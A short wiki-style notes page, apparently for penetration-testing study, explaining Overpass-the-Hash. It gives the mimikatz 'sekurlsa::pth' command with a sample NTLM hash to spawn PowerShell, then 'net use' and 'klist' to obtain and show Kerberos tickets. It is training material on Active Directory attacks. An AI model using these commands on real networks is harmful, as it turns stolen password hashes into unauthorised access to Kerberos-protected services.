Overpass-the-Hash

The goal is to use a NTLM hash to get a TGT. Once we have a TGT, we can access all kerberos protected services that we couldn't access with only our NTLM hash.

Inside mimikatz:

> sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell

This spawns a powershell session.

From this session we can for example trigger authentication to a smb share.

net use \\files04

This should have generated a TGT and a TGS! We can see it with:

klist

Now we can access the kerberos services.

PreviousPass-the-Hash NextPass-the-Ticket

Last updated 2 years ago